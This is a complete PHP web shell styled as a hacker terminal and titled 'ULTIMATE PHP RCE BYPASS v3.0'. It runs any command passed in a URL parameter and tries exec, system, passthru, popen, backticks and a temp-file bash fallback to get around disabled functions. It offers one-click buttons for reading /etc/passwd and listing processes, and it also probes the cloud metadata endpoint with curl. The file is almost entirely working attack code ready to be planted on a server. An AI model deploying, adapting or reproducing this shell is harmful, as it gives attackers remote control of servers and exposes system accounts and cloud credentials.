📖 File Reader
<!DOCTYPE html>
<html>
<head>
<title>🛡️ ULTIMATE PHP RCE BYPASS v3.0 🛡️</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: 'Courier New', monospace;
background: #0a0a0a;
color: #00ff41;
height: 100vh;
overflow: hidden;
}
.terminal { height: 100vh; display: flex; flex-direction: column; padding: 20px; }
.header {
background: rgba(0,255,65,0.15);
padding: 15px;
border-radius: 8px;
margin-bottom: 15px;
border: 1px solid #00ff41;
}
.header h1 { color: #ff0040; font-size: 18px; margin-bottom: 10px; }
.info { font-size: 12px; color: #00aaff; }
.input-area {
background: rgba(0,0,0,0.9);
border: 2px solid #00ff41;
border-radius: 8px;
padding: 15px;
margin-bottom: 10px;
display: flex;
gap: 10px;
}
#cmd-input {
flex: 1; background: transparent; border: none; color: #00ff41;
font-family: inherit; font-size: 14px; outline: none; padding: 5px;
}
.btn { padding: 10px 16px; border: none; border-radius: 5px; cursor: pointer; font-family: inherit; }
.exec-btn { background: #ff0040; color: white; font-weight: bold; }
.clear-btn { background: #333; color: #00ff41; }
.output {
flex: 1; background: #000; border: 1px solid #333;
border-radius: 8px; padding: 15px; overflow-y: auto;
font-size: 13px; line-height: 1.5; white-space: pre-wrap;
}
.output::-webkit-scrollbar { width: 6px; }
.output::-webkit-scrollbar-thumb { background: #00ff41; }
.success { color: #00ff41 !important; }
.error { color: #ff0040 !important; }
.method { color: #ffaa00 !important; }
.quick-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(100px, 1fr)); gap: 5px; margin-bottom: 10px; }
.quick-btn { padding: 8px; background: rgba(255,255,255,0.1); border: 1px solid #666; color: #ccc; border-radius: 4px; cursor: pointer; font-size: 11px; }
.quick-btn:hover { background: #00ff41; color: #000; }
</style>
</head>
<body>
<div class="terminal">
<div class="header">
<h1>🛡️ ULTIMATE PHP EXEC BYPASS TERMINAL 🛡️</h1>
<div class="info">
🎯 <?php echo $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']; ?> |
👤 <?php echo get_current_user(); ?> |
⚙️ PHP <?php echo phpversion(); ?> |
📁 <?php echo getcwd(); ?>
</div>
</div>
<div class="input-area">
<input type="text" id="cmd-input" placeholder="whoami, id, ls -la, find / -name '*flag*'" autofocus>
<button class="btn exec-btn" onclick="runCmd()">EXEC 🚀</button>
<button class="btn clear-btn" onclick="clearOut()">CLEAR</button>
</div>
<div class="quick-grid">
<button class="quick-btn" onclick="quick('whoami')">whoami</button>
<button class="quick-btn" onclick="quick('id')">id</button>
<button class="quick-btn" onclick="quick('ls -la')">ls</button>
<button class="quick-btn" onclick="quick('cat /etc/passwd')">users</button>
<button class="quick-btn" onclick="quick('find / -name "*flag*" 2>/dev/null | head -5')">flags</button>
<button class="quick-btn" onclick="quick('ps aux')">ps</button>
</div>
<div id="output" class="output">
💚 Terminal ready | Working methods will auto-detect...
</div>
</div>
<script>
const input = document.getElementById('cmd-input');
const output = document.getElementById('output');
input.focus();
input.onkeypress = e => e.key=='Enter' && runCmd();
function addLine(text, cls='') {
output.innerHTML += `<div class="${cls}">${escapeHtml(text)}\n</div>`;
output.scrollTop = output.scrollHeight;
}
function escapeHtml(t) { return t.replace(/[&<>"']/g, m=>({ '&':'&', '<':'<', '>':'>', '"':'"', "'":''' })[m]); }
function clearOut() { output.innerHTML = '💚 Cleared\n'; }
function quick(cmd) { input.value = cmd; runCmd(); }
function runCmd() {
const cmd = input.value.trim();
if(!cmd) return;
addLine('➤ ' + cmd, 'method');
input.value = '';
window.location.href = '?c=' + encodeURIComponent(cmd);
}
</script>
<?php
if(isset($_GET['c'])) {
$cmd = $_GET['c'];
echo "<div class='success'>Executing: $cmd</div>";
// METHOD 1: Direct function calls (if not disabled)
$methods = [
'exec' => 'exec',
'shell_exec' => 'shell_exec',
'system' => 'system',
'passthru' => 'passthru',
'popen' => function($c) {
$p = popen($c, 'r');
$out = '';
while(!feof($p)) $out .= fread($p, 1024);
pclose($p);
return $out;
}
];
foreach($methods as $name => $func) {
if(is_callable($func)) {
ob_start();
if($name == 'popen') {
echo $func($cmd);
} else {
$func($cmd);
}
$result = ob_get_clean();
if(trim($result) != '') {
echo "<div>✅ $name WORKS:</div>";
echo "<div class='success'>$result</div>";
exit;
}
}
}
// METHOD 2: Backticks (most reliable)
ob_start();
$result = `$cmd 2>&1`;
$output = ob_get_clean();
if(trim($result) != '') {
echo "<div>✅ Backticks:</div>";
echo "<div class='success'>$result</div>";
exit;
}
// METHOD 3: File-based execution
$tmpfile = tempnam(sys_get_temp_dir(), 'cmd');
file_put_contents($tmpfile, $cmd);
$result = shell_exec("bash $tmpfile 2>&1");
unlink($tmpfile);
if($result) {
echo "<div>✅ File exec:</div>";
echo "<div class='success'>$result</div>";
exit;
}
// METHOD 4: curl to command (if external access)
$curl_cmd = "curl -s 'http://169.254.169.254/latest/meta-data/' -d '$cmd'";
$result = shell_exec($curl_cmd);
if($result) echo "<div class='success'>$result</div>";
echo "<div class='error'>❌ ALL DIRECT METHODS BLOCKED</div>";
echo "<div class='info'>Try LFI / RFI / file upload bypass</div>";
}
?>
</body>
</html>